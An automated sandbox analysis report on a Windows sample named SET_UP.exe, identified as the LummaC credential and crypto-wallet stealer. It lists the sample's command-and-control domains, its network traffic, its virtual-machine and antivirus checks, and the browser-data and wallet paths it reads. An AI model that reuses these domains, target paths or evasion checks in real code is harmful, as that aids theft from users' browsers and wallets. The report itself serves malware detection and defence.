              Source: SET_UP.exe, 00000000.00000003.1766192279.00000000009F8000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1792533320.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906733986.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1793505529.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1793064459.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1805838052.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1805928327.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1903390472.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1903390472.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1792493921.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782179637.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1806395718.00000000036C8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1821548678.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://glowscarrytsv.sbs/
              Source: SET_UP.exe, 00000000.00000003.1903390472.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://glowscarrytsv.sbs/B
              Source: SET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://glowscarrytsv.sbs/api
              Source: SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://glowscarrytsv.sbs/api7
              Source: SET_UP.exe, 00000000.00000003.1903390472.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://glowscarrytsv.sbs/api9
              Source: SET_UP.exe, 00000000.00000002.1906733986.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://glowscarrytsv.sbs/apia
              Source: SET_UP.exe, 00000000.00000003.1903390472.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://glowscarrytsv.sbs/apim
              Source: SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://glowscarrytsv.sbs/apis
              Source: SET_UP.exe, 00000000.00000003.1805928327.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://glowscarrytsv.sbs/apiv
              Source: SET_UP.exe, 00000000.00000002.1906733986.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://glowscarrytsv.sbs/apiwg
              Source: SET_UP.exe, 00000000.00000003.1767425776.0000000003755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: SET_UP.exe, 00000000.00000003.1767636057.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767534628.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782141023.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767425776.0000000003753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: SET_UP.exe, 00000000.00000003.1767534628.00000000036E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: SET_UP.exe, 00000000.00000003.1767636057.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767534628.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782141023.0000000003707000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1767425776.0000000003753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: SET_UP.exe, 00000000.00000003.1767534628.00000000036E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: SET_UP.exe, 00000000.00000003.1766940665.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766846038.00000000036FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: SET_UP.exeString found in binary or memory: https://www.innosetup.com/
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: SET_UP.exe, 00000000.00000003.1794212261.00000000037D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: SET_UP.exeString found in binary or memory: https://www.remobjects.com/ps
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009A49C9 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_009A49C9
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009504090_2_00950409
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009A49C90_2_009A49C9
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009960960_2_00996096
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009500000_2_00950000
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009720400_2_00972040
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0095F07A0_2_0095F07A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009551C60_2_009551C6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009891160_2_00989116
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009581060_2_00958106
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0095A1360_2_0095A136
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0096C1270_2_0096C127
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0096C1560_2_0096C156
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0096E1460_2_0096E146
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0095B1460_2_0095B146
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0096F2F60_2_0096F2F6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009792F70_2_009792F7
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009812F60_2_009812F6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009923960_2_00992396
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009573860_2_00957386
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009543D60_2_009543D6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0097A3C60_2_0097A3C6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009643360_2_00964336
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009963560_2_00996356
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0098843D0_2_0098843D
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0096C4460_2_0096C446
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009695170_2_00969517
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0096F5760_2_0096F576
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0097656C0_2_0097656C
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009636BE0_2_009636BE
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0095C6D60_2_0095C6D6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009676250_2_00967625
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009846590_2_00984659
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009966560_2_00996656
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0098E6460_2_0098E646
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0098F6660_2_0098F666
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009667860_2_00966786
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0098178F0_2_0098178F
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009547A60_2_009547A6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009817A50_2_009817A5
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0098D8CE0_2_0098D8CE
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0098E8760_2_0098E876
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0095A9760_2_0095A976
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00979A930_2_00979A93
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00969ABE0_2_00969ABE
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00988AB30_2_00988AB3
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00994ACB0_2_00994ACB
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00962AC10_2_00962AC1
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0096EA160_2_0096EA16
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0095EA1D0_2_0095EA1D
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0096DA1E0_2_0096DA1E
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00973A260_2_00973A26
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00960BD60_2_00960BD6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00971B4F0_2_00971B4F
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00955B760_2_00955B76
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00986C960_2_00986C96
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0095ACA60_2_0095ACA6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00982CA60_2_00982CA6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00995CE60_2_00995CE6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00985C3A0_2_00985C3A
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00957C760_2_00957C76
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0096ED860_2_0096ED86
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00981DAB0_2_00981DAB
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0098DD060_2_0098DD06
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00984D390_2_00984D39
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00958EE60_2_00958EE6
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0095FE460_2_0095FE46
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0095BFB90_2_0095BFB9
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00963FA70_2_00963FA7
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0098DF660_2_0098DF66
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 00959A76 appears 74 times
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: String function: 00966776 appears 113 times
              Source: SET_UP.exeStatic PE information: invalid certificate
              Source: SET_UP.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: SET_UP.exe, 00000000.00000003.1742632855.000000000306E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs SET_UP.exe
              Source: SET_UP.exe, 00000000.00000002.1907056872.0000000000DA8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs SET_UP.exe
              Source: SET_UP.exe, 00000000.00000000.1655032089.0000000000732000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs SET_UP.exe
              Source: SET_UP.exeBinary or memory string: OriginalFileName vs SET_UP.exe
              Source: SET_UP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00950B19 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_00950B19
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: SET_UP.exe, 00000000.00000003.1767206139.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1782179637.00000000036C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SET_UP.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
              Source: SET_UP.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
              Source: SET_UP.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
              Source: SET_UP.exeString found in binary or memory: /LoadInf=
              Source: C:\Users\user\Desktop\SET_UP.exeFile read: C:\Users\user\Desktop\SET_UP.exeJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: SET_UP.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: SET_UP.exeStatic file information: File size 77268426 > 1048576
              Source: SET_UP.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2bfa00
              Source: SET_UP.exeStatic PE information: section name: .didata
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_0097ED99 push es; mov dword ptr [esp], eax0_2_0097EDA0
              Source: C:\Users\user\Desktop\SET_UP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\SET_UP.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exe TID: 7724Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exe TID: 7752Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: SET_UP.exe, 00000000.00000003.1792533320.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906469607.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1805928327.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW b
              Source: SET_UP.exe, 00000000.00000002.1906469607.00000000009E7000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1792533320.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1903506945.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1821699988.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1766192279.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\SET_UP.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00950409 mov edx, dword ptr fs:[00000030h]0_2_00950409
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_009509C9 mov eax, dword ptr fs:[00000030h]0_2_009509C9
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00951019 mov eax, dword ptr fs:[00000030h]0_2_00951019
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00951018 mov eax, dword ptr fs:[00000030h]0_2_00951018
              Source: C:\Users\user\Desktop\SET_UP.exeCode function: 0_2_00950D79 mov eax, dword ptr fs:[00000030h]0_2_00950D79

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: SET_UP.exeString found in binary or memory: glowscarrytsv.sbs
              Source: SET_UP.exeString found in binary or memory: nearycrepso.shop
              Source: SET_UP.exeString found in binary or memory: cloudewahsj.shop
              Source: SET_UP.exeString found in binary or memory: noisycuttej.shop
              Source: SET_UP.exeString found in binary or memory: rabidcowse.shop
              Source: SET_UP.exeString found in binary or memory: framekgirus.shop
              Source: SET_UP.exeString found in binary or memory: tirepublicerj.shop
              Source: SET_UP.exeString found in binary or memory: abruptyopsn.shop
              Source: SET_UP.exeString found in binary or memory: wholersorie.shop
              Source: C:\Users\user\Desktop\SET_UP.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: SET_UP.exe, 00000000.00000003.1821699988.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.1906469607.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1821699988.0000000000A1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\SET_UP.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: SET_UP.exe PID: 7620, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: SET_UP.exe, 00000000.00000003.1807449466.0000000000A53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: SET_UP.exe, 00000000.00000003.1807449466.0000000000A53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: SET_UP.exe, 00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: SET_UP.exe, 00000000.00000003.1807449466.0000000000A53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: SET_UP.exe, 00000000.00000003.1807449466.0000000000A37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: SET_UP.exe, 00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: SET_UP.exe, 00000000.00000003.1807449466.0000000000A53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: SET_UP.exe, 00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: SET_UP.exe, 00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\SET_UP.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
